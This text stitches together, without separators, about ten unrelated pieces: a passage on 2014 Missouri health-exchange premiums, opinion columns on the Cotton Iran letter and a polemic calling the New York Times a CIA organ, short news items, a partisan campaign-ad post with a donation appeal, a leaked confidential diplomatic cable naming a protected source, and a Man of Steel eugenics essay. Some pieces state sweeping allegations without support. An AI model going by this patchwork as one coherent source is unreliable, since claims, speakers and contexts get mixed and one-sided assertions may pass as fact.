That Anthem plan, however, appears to have a significant drawback. Local health insurance brokers and consultants say it excludes two major health care systems from its provider network for individual and family policies: St. Louis-based BJC Healthcare and its affiliated physicians, and Chesterfield-based Mercy Health and its doctors.
Anthem's promotional brochure indicates that purchasers of Anthem's health plans on the Missouri exchange will be covered by the “Pathway X” network, but it does not specify which hospitals are included in that network.
Steve Martenet, chief executive of Anthem's St. Louis-based subsidiary, declined to be interviewed. Anthem officials refused repeatedly to discuss or explain the details of their health insurance policies.
In contrast, Coventry is offering a less expensive gold-rated plan on the Missouri exchange with a broader network that includes BJC Healthcare. For a 27-year-old nonsmoker, the monthly premium is $270 before subsidies, according to the federal database.
Both insurers are offering lower-cost, silver- and bronze-rated plans, but those have much higher deductibles. Buyers of Coventry plans can choose between a wide network of providers or a narrow network; the wide network with more hospital and physician choices has higher monthly premiums.
One of Anthem's cheapest insurance plans on the Missouri exchange is the Bronze Direct Access “caar” plan with a health savings account. The monthly premium for an individual is $180, but that plan has a $6,300 deductible.
For policyholders, high deductibles add significant risk. If someone gets seriously ill, badly injured or simply needs a lot of medical care, that person or family risks potential exposure to sudden, expensive medical bills and out-of-pocket limits that could amount to a substantial portion of their household income.
Bill Hill, president of Visor Benefits, a Des Peres-based health benefits consulting firm, said the policy rates for 2014 both on and off the exchange are “not really affordable.”
“It's a wonderful deal for those people who have serious ongoing medical conditions, and it's a terrible deal for the middle class,” he said. “(But) given the restrictions of the law and the risks that (insurance carriers) have to accept, the rates are probably priced too low.”
Ryan Barker, vice president for health policy at the nonprofit Missouri Foundation for Health, expects competition to help drive down rates in the future.
He was disappointed to see only two insurers offering plans on the exchange in each of Missouri's 10 rating areas.
“It's not as much competition as we'd like to see,” Barker said. “I think we'll see more insurance companies jump in once this is more settled.”
The Limits Of Subsidies
Depending on an applicant's income, subsidies can significantly lower one's monthly premium. For a 35-year-old single person in St. Louis County who earns $25,000 a year, the subsidy would be up to $1,369 a year on a silver-rated plan, lowering the person's monthly premium by $114 a month, according to a subsidy calculator developed by Kaiser Family Foundation and available at MoHealthReport.com.
Depending on a person's age, a single individual could earn as much as $46,000 and still qualify for a subsidy. The income limit is about $62,000 for a couple and about $94,000 for a family of four.
Although potentially helpful, tax subsidies won't alter the risk of these new health plans.
“My concern is that the out-of-pocket expense is skyrocketing,” said Blair, the health insurance broker. “The risk is going up and the premiums are going up — unless you get the subsidy. And there's a big contraction in the (provider) networks.”
Insurers are excluding higher-priced providers from some of their networks to reduce the payout for medical bills, he said, and raising premiums and out-of-pocket limits to cover the overall cost of claims. Out-of-pocket expenses are the medical costs, including co-pays for office visits and drugs, that the consumer must pay; once a limit is reached, the insurer will cover the rest.
As a result, the insurance plans certified on Missouri's federal-run health exchange appear to be significantly more expensive compared to 2013's policy rates on the open market.
The out-of-pocket limit for an individual with Anthem's Gold Direct Access “ccab” plan is $6,000, according to an Anthem brochure. For a family, the out-of-pocket limit would be $12,000.
Blair said that an average monthly premium today for a health plan that is roughly equivalent to Anthem's “ccab” plan is about $180. The 2013 plan has a broad provider network, a $1,000 deductible and an out-of-pocket limit of $1,000.
In other words, consumers will pay about 50 percent more in 2014 for a similar policy on the exchange, except that the provider network will be more narrow. In addition, the consumer will face $5,000 in additional risk in potential out-of-pocket costs.
Under federal law, those out-of-pocket limits cannot exceed $6,350 for an individual and $12,750 for a couple or family — after which, the insurer picks up the remaining costs. Monthly premiums do not count toward the out-of-pocket limits.
Compared to an insurer's costs, those limits may seem like chump change. An individual who has a high-risk pregnancy may run up more than $50,000 of medical costs but be held responsible for less than 15 percent of those costs.
Still, a person's total health care budget under a generous plan can — with sickness or injury —mushroom quickly. And because of the high cost of medical care, those who purchase less expensive bronze-rated plans are more likely to forgo all but the most basic preventive care.
A Family Of Four
It appears that Jeff Rousseau, the St. Louis attorney, wouldn't qualify for a subsidy if he bought insurance on the Missouri health exchange because his employer offers a health plan for his family members that the government views as affordable.
Even if he did buy coverage on the exchange, Rousseau couldn't find a plan as good as what he's got now for his wife and kids. Their current plan from Anthem has a monthly premium of $295 with a $3,000 deductible.
The policy is leaner in terms of coverage. It does not include maternity or mental health care, which the federal law will require in 2014. But there are no out-of-pocket expenses after the deductible. And it has a wide, “worry free” network of health providers, including the family's pediatrician and his wife's gynecologist.
Blair, the family's insurance broker, said if Rousseau tries to find similar coverage for his family on the health insurance exchange for 2014, the closest he could find from Anthem would be a $521 monthly premium and $6,000 deductible — plus an additional 10 percent co-insurance of up to $1,200.
That's $226 more for the monthly premium and double the current deductible, as well as a co-insurance.
While he could elect to forgo his employer's plan and continue to buy insurance for his wife and kids on the open market, Rousseau won't get the same value for the dollar in 2014. If he purchases a similar-rated plan that has a broad provider network for his wife and kids from UnitedHealthcare on the open market, the monthly premium would be about $647, Blair said.
Until recently, Rousseau was scrambling to secure new coverage for his wife and kids. But last week, Anthem sent him a letter saying it could extend their current coverage for one more year. Rousseau said he will probably put his family back on his employer's plan after the extension.
Rousseau said he's confused why Anthem's new plans both on and off the exchange are so expensive.
“I'm not sure why I would have to pay more, unless I'm covering other losses they're paying,” he said.
Tom Cotton's sophomoric stunt of an open letter to the Iranians telling them not to have confidence in whatever the United States puts on the negotiating table has received the broad and swift condemnation it deserves. Some of the strong criticism has come from editorial pages and other sources of commentary that generally are not very friendly toward the Obama administration in general or even to its policies on Iran in particular. A bright side to this incident that embarrasses and disgraces half of the United States Senate comes in the clarity it provides in terms of what games are being played and what is at stake. Even before this latest antic, Cotton deserved credit for being more honest about his objective than most of his colleagues who are engaged in the same destructive efforts to undermine diplomacy on Iran. Cotton has stated openly and explicitly that his goal is to kill off any agreement at all with Iran. Unlike many others, he has not tried to fool us with the subterfuge that legislative sabotage is aimed at getting a chimerical “better deal” with Iran. Now with the letter, the unwritten alliance between American hardliners and Iranian hardliners in opposing any agreement is made more open than ever.
What is going on here is not just the work of Tom Cotton. The outrageous letter to the Iranians flows naturally from a broader ongoing process. The fact that the great majority of Republican senators signed the letter is the most obvious indication of that. There no doubt is today much regret in the senatorial offices involved, but the fact is that 47 of them signed it. There are a couple of possible interpretations of what took place among the members, neither of which makes those members look good. One is that they are so distracted or careless that they can let a 37-year-old who has been in the Senate only two months rope them into doing something this stupid. The other, which is the more plausible interpretation, is that Cotton's letter was only the latest vehicle for a journey that the whole party has already been taking for some time.
The letter was a natural next step after bringing Benjamin Netanyahu to the Capitol for the express purpose of denouncing and opposing U.S. policy toward Iran. In each case it was a matter of Congressional Republicans enlisting foreigners to try to sabotage a major element of current U.S. foreign policy. Because Israel is considered an “ally,” Netanyahu got to use the podium in the House chamber whereas Iranian hardliners do not get that privilege. But the fundamental nature and purpose of what was taking place was the same.
The impact of all of this on the immediate prospects for completing a nuclear deal between the P5+1 and Iran is certainly important and has been the subject of much of the immediate commentary about the letter. There is a basis for optimism that this clownish overplaying of their hand by some of those who would like to sabotage the diplomacy will lessen the danger of such sabotage. The episode at least demonstrates why, if one wants U.S. policy toward Iran to be formulated and executed in a responsible and adult way, then for the time being the less Congressional involvement there is the better.
We ought to reflect also, however, on how the kind of irresponsible behavior we have just seen is part of a bigger pattern that goes well beyond policy toward Iran and has deleterious effects on U.S. interests abroad besides what happens to an Iranian nuclear deal. This behavior damages U.S. credibility. There is an irony here in that some of those who signed Cotton's letter have been among those who have bemoaned supposed diminishing of America's international credibility because of other matters, usually involving issues of whether the United States should persist in prosecuting overseas military operations where any direct U.S. interests being protected are questionable. U.S. credibility is not determined by military doggedness in such situations. It is partly determined by the United States living up to negotiated multilateral agreements that are clearly in its interests, as would be the case with a P5+1 agreement to restrict Iran's nuclear program. Probably the single most remarkable—and egregious—aspect of the Cotton letter is that it was blatantly and expressly designed to damage U.S. credibility . In the future, it will lack credibility for any signatory of this letter to complain about alleged damage to U.S. credibility regarding anything else.
The connection between the sort of behavior we are talking about and the standing of the United States overseas, however, is even broader than that and extends to the handling of domestic policy. Foreigners and foreign governments observe how the United States, the superpower with the world's largest economy, handles its own affairs, and they draw conclusions about how viable and reliable an interlocutor the United States would be on international matters. The foreigners are looking to see whether there is consistency and rationality in how the U.S. political system pursues U.S. national interests. If they do see those things, then the United States is someone they can do business with, whether as a rival or as an ally, even if U.S. interests differ from their own. If they do not see those things, then opportunities are lost for doing business that would benefit both the United States and the foreign state.
A nation does not represent itself as a viable interlocutor, whose execution of policy can be trusted by other nations, if passionate internal divisions supersede sober pursuit of the nation's interests. As an outsider we encounter such situations in, say, Iraq, where sectarian loyalties and hatreds make it impossible to rely on a government in Baghdad consistently pursuing an Iraqi national interest. We also see it in Bangladesh, where the personal animosity between the “two begums” who head each of the major political parties there have made Bangladeshi politics so dysfunctional that in the recent past the military has had to step in.
A pattern that is similar in some respects has, tragically, come to prevail in the United States. Foreigners could hear the then minority (now majority) leader of the United States Senate state a few years ago that his number one priority was not any particular U.S. national interest in either domestic or foreign affairs but instead the prevention of a second term for the incumbent U.S. president. Foreigners then were able to see the senator's party act along the same lines, using extortionate legislative methods to push a partisan agenda even at the expense of damaging the country's credit rating and causing disruptive interruptions to government operations. Once the same party achieved a majority in both houses of Congress there was much talk about how this would lead to newly responsible behavior, but the opening gavel of the new Congress had hardly fallen when once again there was the tactic of holding the operations of a government department hostage to press a specific partisan demand (this time on immigration) in opposition to the president's policies.
Foreigners can see today in the same party an animosity toward the other party and especially to the current U.S. president that is as passionate as the sectarian hatreds in Iraq or the personal hatreds between the begums in Bangladesh, and that leads to at-all-costs efforts to defeat any achievements by this president. The biggest such achievement in foreign policy would be an accord to restrict the Iranian nuclear program—hence all the pulling out of stops, aided by the role of Netanyahu and the Iranian hardliners, to defeat such an agreement. The biggest achievement in domestic policy has been the Affordable Care Act—hence while those proverbial crumbling roads and bridges in the U.S. infrastructure continue to crumble, the House of Representatives spends its time and effort on voting 56 times to repeal the Act. The campaign to destroy Obamacare has become an Ahab-against-the-white-whale obsession that is being endlessly pursued despite mounting evidence of the Act's success ; observant foreigners must be shaking their heads wondering how a country in which such obsessions govern the political system ever got to be a superpower.
The closing of eyes even to the performance of public programs within the United States is but one example of an all-too-conspicuous denial of reality on other matters. Senator James Inhofe, chairman of the Senate Environment and Public Works Committee, gave another demonstration of this the other day when he tossed a snowball in the Senate chamber to emphasize his disbelief in climate change, a prank that rivals what the youngster Cotton has done in demeaning the world's supposedly the greatest deliberative body. The foreign perceptions of all this that matter include not only whether CO2-belching China will live up to its side of international agreements to save the planet but also more broadly what foreigners think about the prospect of doing any business on anything with a government that has a major part of it so far apart from the reality-based community and so disinclined to work responsibly on behalf of its own national interests.
The New York Times steps up its anti-Russia campaign
20 June 2017
The CIA's principal house organ, the New York Times, published a lead editorial Sunday on the investigation into alleged Russian meddling in the 2016 US presidential election that is an incendiary and lying exercise in disinformation aimed at whipping up support for war with Russia.
The editorial was well-timed, coming on the morning of the same day that the US military shot down a Syrian warplane, setting off a dramatic escalation in the US conflict with Russia. The editors of the Times have the closest ties with US military and intelligence officials and no doubt were aware that something was being planned, if they were not briefed about the details.
Under the headline “Mr. Trump's Dangerous Indifference to Russia,” the Times uses the language of war to assert: “A rival foreign power launched an aggressive cyberattack on the United States, interfering with the 2016 presidential election… The unprecedented nature of Russia's attack is getting lost in the swirling chaos of recent weeks, but it shouldn't be.”
The Times presents zero evidence to back up a wild reference to “the sheer scope and audacity of the Russian efforts.” The editorial simply declares, “American intelligence agencies have concluded,” followed by a long list of allegations:
“Under direct orders from President Vladimir Putin, hackers connected to Russian military intelligence broke into the email accounts of senior officials at the Democratic National Committee and of Hillary Clinton's campaign manager, John Podesta. They passed tens of thousands of emails to the website WikiLeaks, which posted them throughout the last months of the campaign in an attempt to damage the Clinton campaign.
“Even more disturbing, hackers sought access to voter databases in at least 39 states, and in some cases tried to alter or delete voter data. They also appear to have tried to take over the computers of more than 100 local election officials in the days before the November 8 vote.”
Editorial page editor James Bennet presents not a single fact that supports the Times ' assertions. What is the evidence that there were “direct orders” from Putin, or that hackers linked to Russian intelligence raided Democratic email accounts and supplied material to WikiLeaks, or that (other?) hackers tried to access voter databases and the computers of local election officials? The entire mountain of accusations is suspended in air.
If one traces back the charges to their original sources, they all turn out to be factually unsupported claims by US intelligence agencies, made either in public “findings” issued in October 2016 and January 2017, or in a series of leaks from within the military-intelligence apparatus, mainly to the Times and the Washington Post.
The most recent allegations, about alleged hacking into voter databases and local election computers, are based on a National Security Agency (NSA) report leaked to The Intercept web publication, which even The Intercept admitted contained no underlying evidence to substantiate the NSA's claims.
Not a single one of the reports in the Times or Post is the product of a genuine investigation by journalists. Instead, the main reporting on the “Russian hacking” affair consists of taking dictation from unidentified intelligence officials. In not a single case did these officials offer evidence to substantiate their claims, invariably made in the form of ambiguous phrases like “we assess,” “we believe,” “we assess with high confidence,” etc. Such claims are worth no more than previous assertions that Iraq possessed weapons of mass destruction—a lie used to justify a war that has killed more than one million people.
In its brazen contempt for basic standards of evidence, the Times ignores more plausible sources of the leaked Hillary Clinton campaign and Democratic Party information, such as an individual or individuals within the Democratic Party. The newspaper makes no mention of the content of the leaked emails, which document the efforts of the Clinton campaign and the Democratic National Committee to sabotage the primary challenge of Bernie Sanders.
For all the rhetorical heat about a supposed Russia assault on “the integrity of American democracy,” as the Times puts it, there is no such outrage over the dozens of interventions by Washington to manipulate elections all over the world.
One recent study found 81 instances—not counting outright CIA-backed military coups—in which the US government financed political parties, organized disinformation campaigns, carried out assassinations, blackmailed candidates, or otherwise sought to install its own nominees by rigging elections in countries on every continent.
One of the most flagrant such examples was the 1996 presidential election in Russia, won by the US-backed Boris Yeltsin (See: “Bill Clinton and Boris Yeltsin: When the White House fixed a Russian election”).
Apart from its continuous interference in elections, the US government is engaged in non-stop snooping operations against foreign governments, even those with which it is supposedly allied. Just a few years ago, it was revealed that the Obama administration had hacked—yes, HACKED—the cell phone of the German chancellor, Angela Merkel. Then-US President Obama acknowledged that the US does all sorts of “stuff” and offered a phony apology.
As for the Times, it has no reservations about serving as a conduit for fact-free propaganda from the US intelligence agencies. This points to the newspaper's putrefaction in recent decades, seen above all in the fact that its leading personnel, particularly on its editorial pages and foreign affairs staff, consist of ex-officio spokesmen for US imperialism, including a stable of CIA flacks such as Nicholas Kristof, Roger Cohen and Thomas Friedman.
The editorial page editor, James Bennet, is the brother of right-wing Democratic Senator Michael Bennet of Colorado and son of Douglas Bennet, a top State Department official in the Carter and Clinton administrations, whose career includes a stint heading the Agency for International Development (AID), a frequent instrument for CIA provocations.
The Times, channeling the intelligence agencies, have a definite political agenda. Powerful factions of the ruling class want to continue and intensify the anti-Russian foreign policy adopted by the Obama administration, particularly in the wake of the 2014 campaign to bring down the elected pro-Russian government in Ukraine and install an ultra-right, pro-US stooge regime.
A recent Times article, focused on Senate passage of new sanctions against Russia, spells out the issues relatively clearly. In “Leaders Wary of Trump May Have an Ally: Congress,” the Times asserts that congressional leaders, both Democratic and Republican, “are working to ensure that American foreign policy remains rooted in the trans-Atlantic alliance against traditional rivals like Russia.” It praises Republican efforts to advance “an anti-Trump foreign policy” and impose sanctions against Russia for its actions in backing the Syrian government.
In the eyes of the factions of the ruling class for which the Times speak, the problem is not that Russia is interfering with “American democracy,” but that it is interfering with critical geo-strategic interests of American imperialism in Syria and the broader Middle East. The newspaper is attempting to condition American public opinion and overcome popular opposition to an escalating military confrontation with the world's second-largest nuclear power.
For the working class, the fight against the Trump administration and the fight against its opponents in the political establishment is the same fight. It is a fight against the capitalist ruling class, which is preparing to inflict on the people of the entire world a new and catastrophic world war.
Patrick Martin
Please enable JavaScript to view the comments powered by Disqus.
The role of a National Security Advisor is of paramount importance, and he is expected to perform his duties with a lot of inquisitiveness and perfection. There is no particular tenure for a national security advisor. The discretion of appointing someone as an advisor vests with the president and the other council members present there. So here are some of the qualities that are very much important for a National Security Advisor.
It is always between the president and the advisor:
The President and the advisor share a very close relationship, and they are expected to function in harmony. There cannot be an intermediary between the President and the advisor. If there are a lot of people to carry information between the president and the advisor, then there will be filtration of information that might go against the welfare the nation. So the president and the advisor must have a good rapport.
Not in favor of a party or a candidate:
The person who has taken the role of the advisor is expected to paint a true and fair picture of the affairs of the state. Usually, people who have the chances of becoming the next advisor are closely involved in the operations of the government. That being the case, during election times, a good advisor is expected to stay neutral instead of voicing his opinion in favor of a particular party at least when he is not in the shoes of a common civilian. His favoritism might at times affect the welfare of the country.
Experience and position:
A person who is potentially going to take the place of the advisor of the National Security Council has to be well educated and must be well aware of the affairs of the state. In most cases, a person who was already a part of any department that is relevant to foreign policies or national security are the ones who are chosen as the potential candidates who can be chosen as the next advisor. So the experience and the present position of the candidate are very much important.
Protest if need be:
Just because an advisor has to have a good rapport with the President he need not have to dance according to the tunes of the President. His primary concern has to be the safety and the welfare of the nation and thereby he can place his opinions strongly and can protest against the president and the other members of the council if need be. If he feels that the President's decisions might not fit the moment, he can place his views bluntly and curtly. Inhibition is not a quality of an advisor.
Adequate Knowledge:
An advisor has to possess good knowledge with regard to the foreign policies that are prevailing among different nations. This will help him make right decisions with regard to the policy affairs of his nation. There are also talks regarding the Eisenhower Test. The candidates who are looking forward to being a part of the National Security Council are expected to take the Eisenhower Test to qualify themselves as potential candidates. This again is going to set a new benchmark.
Image copyright AP Image caption Ramil Safarov was greeted as a national hero in Baku, reports say
Armenia says it is severing diplomatic ties with Hungary after the release of an Azeri army officer convicted of murdering an Armenian soldier.
The Azeri serviceman, Ramil Safarov, was given a life sentence for hacking Armenian Gurgen Markarian to death with an axe in 2004 in Budapest.
On Friday, Safarov was flown to Baku and pardoned, despite Baku's assurances that his sentence would be enforced.
Armenia and Azerbaijan fought a bitter war over an enclave in the early 1990s.
Armenia said on Friday that Hungary had made a "grave mistake" in sending Safarov back to Azerbaijan.
"With their joint actions, Azerbaijan and Hungary opened the door to the recurrence of such crimes," President Serzh Sarkisian said in comments release by his press office.
"I cannot put up with this. The republic of Armenia cannot put up with this," the president added.
The Hungarian authorities said they had returned Safarov to his homeland only after receiving assurances from the Baku government that his sentence would be enforced.
Safarov killed Gurgen Markarian at a military academy in Budapest, where both servicemen attended English-language courses organised by Nato.
During his trial in Hungary, Safarov said that the Azeri-Armenian war over Nagorno-Karabakh and insults from the Armenian officer were at the root of his actions.
Hungary and Azerbaijan have so far made no public comment on the case.
Azerbaijan and Armenia, both former Soviet republics, fought a war over the Nagorno-Karabakh enclave in the early 1990s, which left some 30,000 people dead, and displaced hundreds of thousands.
Armenia-backed authorities are currently controlling Nagorno-Karabakh, which lies within Azerbaijan.
Despite a 1994 ceasefire, skirmishes continue on the borders of the disputed territory.
TORONTO – Last week Donald Cerrone was part of a five-man collective of UFC fighters that announced the formation of the Mixed Martial Arts Athletes Association. A week later, with a fight looming on Saturday night at UFC 206 against Matt Brown, Cerrone said he wasn't nearly as involved with the MMAAA as it might have appeared.
During a media scrum after the open workouts at Massey Hall on Wednesday, Cerrone clarified his standing with the MMAAA, and his featured involvement was a bit of a misunderstanding.
"As far as the Association goes man, Georges [St-Pierre] and Tim [Kennedy] called me and asked me to be part of it," Cerrone said. "I didn't know I was sitting on a board. That kind of took me by surprise, sitting there like, oh wow. I spoke to Dana [White] today on the phone. He's coming to town, and we're going to go out to dinner and talk. There are a lot of things I think this sport needs, you know, retirement pension, health care, things I think we need."
Cerrone was among the five fighters that presented a unified front on the subject of fighter pay, health care, and collective bargaining. Among the others sitting at his side were former heavyweight champion Cain Velasquez, former bantamweight champion TJ Dillashaw, and the aforementioned Kennedy and St-Pierre.
Also working on the board in an "advisory" role was former Bellator CEO, Bjorn Rebney, a divisive presence that became the subject of much scrutiny and debate.
Cerrone said his attendance was more opinion-based, rather than one of the spearheads.
"I wasn't sitting there saying, ‘we're moving forward today, we're going on strike, we need more money," he said during the scrum. "That wasn't coming out of mouth at all. There were a couple of people that were there that I don't plan on working with and being a part of, not mentioning any names. I was there mostly just, not saying I'm leading a board or I'm sitting on a board, but more voicing my opinion of what this sport needs.
"Moving forward, I'm still going to stand strong with those and say this is what I believe we need. I believe as a whole we need health care, we need some kind of pension for retirement. The UFC has been nothing but great to me. I can't complain, they give me what I want. And like Dana said, I called him and he helped me out. That's true, man. I was in a bind, he got the best lawyers you can pay, and saved my ass."
Cerrone reiterated that "it came off wrong," before stating that he would have a conversation with UFC president Dana White while in Toronto. White expressed confusion and disappointment in Cerrone during an interview on the UFC Unfiltered podcast earlier this week, citing his assistance to Cerrone during a recent boat incident.
Asked what White had told him so far, Cerrone said it was a brief discussion.
"He said, listen kid, you can do anything you want. We have a good relationship him and me, and he's right I probably should have called him and said, ‘hey man, I'm going to do this,' instead of getting back-handed in the face."
Communications minister says it has been Tony Abbott's preference not to reappoint board members selected by former Labor government
Malcolm Turnbull has weighed in to the row over appointments to government boards, saying Tony Abbott expressed a preference to “refresh” the members who had been selected by the former Labor government.
The outgoing CSIRO chairman, Simon McKeon, said many people were disappointed and worried about the “quite brutal rule” that no one on the board of a federal agency be reappointed.
“All I'm saying is we're missing out on the corporate memory,” McKeon told an audience at an Australian Institute of Company Directors event on Thursday.
A government spokesman said on Friday that there was “no such policy” and that “a quick check would reveal over 50 government agencies which have reappointed board members who were originally appointed under the former government”.
CSIRO head decries Coalition's 'brutal' ruling out of Labor-appointed directors Read more
Turnbull, the communications minister, described the renewal of board memberships as a “preference” rather than a blanket rule.
“I think it's fair to say that the government has had a policy or a practice of, by and large, not reappointing people, with a view to refreshing government boards,” Turnbull told the ABC. “That has certainly been the preference. There's doubt about that … but like all things, it has exceptions.”
When asked whether the directive was issued by Abbott or the prime minister's chief of staff, Peta Credlin, Turnbull said: “The prime minister has had the view that we should refresh the membership of government boards and, generally, that is what we have done.”
Turnbull said there was “nothing unreasonable about saying that you want to have turnover” to refresh the membership of boards. “Of course it's a reasonable approach,” he said.
But the shadow treasurer, Chris Bowen, said the alleged ban showed Abbott was “a wrecker, more interested in the cheap and confrontational politics over the genuinely conservative and cautious politics”.
“The ultimate victim of this confrontational and personal attack on serving directors of government boards will be the agencies themselves, as they lose the corporate memory and expertise that has developed over the years,” Bowen said.
He praised McKeon, the 2011 Australian of the Year, as “an Australian businessman and philanthropist of repute who has served on government boards and agencies under Labor and Coalition governments”.
Now this is a great ad from Jack Conway, taking Rand Paul to task for having said a "the real answer to Medicare would be a $2,000 deductible":
Voice Over: More from Rand Paul: The real answer to Medicare would be a $2,000 deductible. KY Senior 1: A $2,000 deductible? KY Senior 2: Rand Paul wants us to pay $2,000 just to get Medicare? KY Senior 3: That's crazy. KY Senior 4: I can't afford that. Rand Paul: The real answer to Medicare would be a $2,000 deductible. KY Senior 1: I don't know what planet he's from. KY Senior 5: Rand Paul is off the wall with a $2,000 deductible. KY Senior 6: Doesn't he know that we can't afford that. KY Senior 3: The more we learn about Rand Paul, the worse it gets. Attorney General Jack Conway: I'm Jack Conway. I approve this message.
This ad works because it is credible, entertaining, and important. It's credible because it uses Rand Paul's own words; it's important because raising the Medicare deductible to $2,000 would be a serious burden on seniors; and it's entertaining because instead of a traditional voice over, you get to hear from actual Kentuckians responding to Paul's extreme proposal, and they do so with a biting sense of humor.
The ad also works strategically because older voters tend to vote more heavily in midterm elections and Rand Paul has had loose lips when it comes to his plans to raise Medicare costs for seniors. Just last week, for example, he said seniors need to "bear more of the burden." So this is an issue that impacts likely voters and it's not going away anytime soon.
With Conway and Paul in a dead-heat, Kentucky is very much in play.
Help keep Conway's ad on the air -- chip in $5 or $10 to his campaign today.
Raw content
C O N F I D E N T I A L SECTION 01 OF 02 CARACAS 000918 SIPDIS ENERGY FOR CDAY AND ALOCKWOOD HQ SOUTHCOM ALSO FOR POLAD TREASURY FOR RJARPE NSC FOR RKING USDOC FOR 4332 MAC/ITA/WH/JLAO E.O. 12958: DECL: 07/11/2019 TAGS: ECON, EFIN, PGOV, VE SUBJECT: ALLEGATIONS OF MINISTER DIOSDADO CABELLO'S CORRUPTION EXPANDING TO FINANCIAL SECTOR REF: A. CARACAS 887 B. 2008 CARACAS 1754 C. CARACAS 287 D. CARACAS 322 E. CARACAS 663 Classified By: Economic Counselor Darnall Steuart for reasons 1.4 (b) and (d). 1. (C) In a lunch with EconCouns and Econoff on July 10, respected political economist Orlando Ochoa (strictly protect throughout) alleged Minister of Public Works and Housing Diosdado Cabello was expanding his network of corruption into the financial sector. According to Ochoa, Cabello and several other former military officers who participated with Chavez in his 1992 coup attempt (specifically Vice Minister of Finance Alejandro Andrade, Governor of Aragua and former Minister of Finance Rafael Isea, and Science and Technology Minister Jesse Chacon) recently backed the purchase of several small banks and insurance companies. The frontman for the group's foray into the financial sector, Ochoa continued, is Pedro Torres Ciliberto, owner of the small, Tachira-based investment bank Baninvest (to which he had named Chacon's brother as president). Ochoa speculated the group was moving into the local financial sector in part to gain easier access to arbitrage opportunities related to Venezuela's currency controls, particularly if the Central Bank began auctioning hard currency to financial institutions (as has been rumored to be under consideration). Ochoa characterized Cabello's group as one of the three major poles of corruption close to or within the GBRV. The second pole, operating in the oil sector, is associated with Oil Minister and PDVSA President Rafael Ramirez, and the third, operating in the food distribution sector, is associated with "Mercal King" Ricardo Fernandez. 2. (C) On the political front, Ochoa argued the "fascist and military" trend associated with Cabello was gaining ascendancy within Chavismo. (Note: By invoking the term fascist, Ochoa was referring to the movement's desire for authoritarian government control over society and the economy in a way that brooks no dissent. End note.) He characterized Cabello's strident speech in the National Assembly July 9 outlining increased state control over the media (ref A) as an indication of this ascendancy. Another indication, Ochoa continued, were reports from his financial sector contacts that former Vice President Jose Vicente Rangel was a partner in Cabello's group's investments (or at least allowing his money to be managed by Torres Ciliberto). In tandem with the rise of the fascist/military trend, Ochoa argued, the two key representatives of the "traditional Marxist left" in Chavez's cabinet, Planning Minister Jorge Giordani and Finance Minister Ali Rodriguez, were losing influence, with Rodriguez's health in decline and Giordani "looking to get out." Ochoa felt the traditional left was becoming increasingly disenchanted, at least in private, with Chavez's Bolivarian revolution, largely due to blatant corruption and the realization that desire for power, rather than achievement of socialist goals, was its driving force. 3. (C) Ochoa described Cabello as a potential "Montesinos-like" figure for the Chavez regime, i.e. someone who, like intelligence chief Vladimir Montesinos under President Fujimori in Peru, was amassing great power and control over the regime's apparatus as well as a private fortune, often through intimidation behind the scenes. Ochoa speculated Chavez himself might be concerned about Cabello's growing influence but unable to diminish it. Ochoa said he was coordinating with several others, including Tal Cual editor Teodoro Petkoff, to expose Cabello's questionable business dealings publicly, though he acknowledged the need to proceed carefully given how "dangerous" Cabello was. Ochoa hoped this exposure would cause further disillusion within the traditional left, part of a process through which this trend might ultimately withdraw its support from Chavez. 4. (C) Comment: Ochoa is a well-respected political economist with strong contacts in the financial sector and a growing network of contacts within the traditional left. We know from other contacts that people close to the government CARACAS 00000918 002 OF 002 have been buying, or trying to buy several small banks, and we would not be surprised if Diosdado Cabello and his associates were involved. Cabello's increasing influence in government is clear: Chavez appointed him Minister of Infrastructure in December 2008 (after Cabello lost his reelection bid for governor of Miranda; ref B); Chavez added the housing portfolio to Cabello's ministry on March 3, renaming it the Ministry of Public Works and Housing (ref C); the National Assembly passed a law on March 12, 2009 which effectively gave control over ports, airports, and roads (previously managed by the states) to the Ministry of Public Works and Housing (ref D); and CONATEL, the GBRV's media regulatory body, was transferred to the Ministry of Public Works and Housing on May 15 (ref E). What bears closer watching is Cabello's behind-the-scenes power, or at least the specific ways he exercises it. End comment. CAULFIELD
The eugenics program of the early 20th century is a stain on the morality of the people and government of the United States.
One of the slogans of the movement read, “Some people are born to be a burden on the rest.” It is a movement which gave more kindling to racist thoughts and practices, and sparked the basis of the Nazi movement. The very thought of the superiority of one person over another is anathema to the Declaration of Independence (something most of our founding fathers did not follow consistently, either). Thankfully though, it has all but ended. Forced sterilizations, testing on humans deemed unworthy to carry on genes, and laws against people with lower IQ's from procreating have been abolished. But what if it had continued? I think the Krypton in Zack Snyder's Man of Steel, shows us what would have happened if America had allowed that idea to continue and thrive.
Kryptonians were bred, predetermined by their government into certain roles as it deemed them fit. There was no choice. DNA was altered, minds changed in order to build each individual into nothing more than a machine. From what we can tell, sickness and disease was all but wiped out from the planet; but so was their morality, so was what made them human. When Jor-El was explaining Krypton's history to Kal-El, he began with their creativity, their want to explore the expanse in search of life, to further their discovery. He spoke of their hope and wonder at the created universe. Then they turned inward. They stopped exploring and began building a better Kryptonian through selective breeding. Much like the selective breeding, the weeding out of people with deformities or mental illnesses, those deemed “unfit to breed” by the U.S. government through the eugenics program, Krypton changed. No longer creative, no longer interested in exploration, they sterilized those who would pass on bad genes, aborted those who would hold them back. They created a superior race and gained longer life, and a healthier, longer living people, at the cost of their civilization.
Superman, and his creators, railed against the very thought of eugenics. And we can see in Zack Snyder's Man of Steel, this come to full fruition. Jor-El and his wife, Lara, have had enough of the dehumanization of Krypton society, and Lara bears the first naturally born child on Krypton in centuries. This is over and against the selective eugenic breeding practices that created the master warrior race, which culminated in the “best” of Krypton's creations, General Zod. Even after exile, Zod and the others still hold to their ideals, and look to create a new Krypton on earth. In the battle at Smallville, Faora-Ul continues the theme of eugenics and its partner, naturalistic Darwinism, in stating how he is weak because he mirrors what she calls the weakness of humanity. “The fact that you possess a sense of morality and we do not give us an evolutionary advantage. And if history had proved anything it is that evolution always wins.”
